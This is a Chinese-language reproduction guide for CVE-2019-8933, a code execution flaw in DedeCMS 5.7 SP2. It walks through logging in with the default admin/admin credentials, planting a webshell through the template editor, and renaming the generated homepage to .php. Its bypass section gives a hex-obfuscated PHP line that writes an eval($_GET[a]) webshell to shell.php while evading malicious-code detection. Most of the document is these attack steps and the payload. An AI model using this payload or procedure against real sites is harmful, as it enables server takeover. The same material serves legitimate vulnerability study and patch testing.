DedeCMS 5.7SP2 代码执行漏洞 CVE-2019-8933
漏洞描述
Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)公司的一套基于 PHP 的开源内容管理系统(CMS)。该系统具有内容发布、内容管理、内容编辑和内容检索等功用。 DedeCMS 5.7 SP2 版本中存在漏洞。远程攻击者可经过在添加新模板时,将文件名 ../index.html 更改成 ../index.php 应用该漏洞向 uploads/ 目录上传 .php 文件并执行该文件。
漏洞影响
DedeCMS 5.7 SP2
漏洞复现
默认后台登陆路径 /dede/login.php
或 /uploads/dede/login.php
,默认用户名密码 admin/admin
。
模板 -> 默认模板管理 -> 新建模板,写入shell,保存:
生成 -> 更新主页 HTML -> 浏览:
选择主页模板:default/newtpl.htm
主页位置:更改.html后缀为.php
首页模式:生成静态
连接 webshell:
http://<YOUR-IP>/index.php
BYPASS
如果被检测到存在恶意代码:
进行绕过,保存成功:
// file_put_contents('./shell.php', "<?php eval($_GET[a]);");
<?php
"\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_GE" . "T[a]);");
核心 -> 频道类型 -> 单页文档管理,通过新建模板 newtpl.htm
新建页面,更改 .html 后缀为 .php:
现在,我们在 /a/
目录下创建了一个文件,访问 /a/npc.php
页面,将会执行 file_put_contents
函数生成一个 shell.php
:
http://<YOUR-IP>/a/shell.php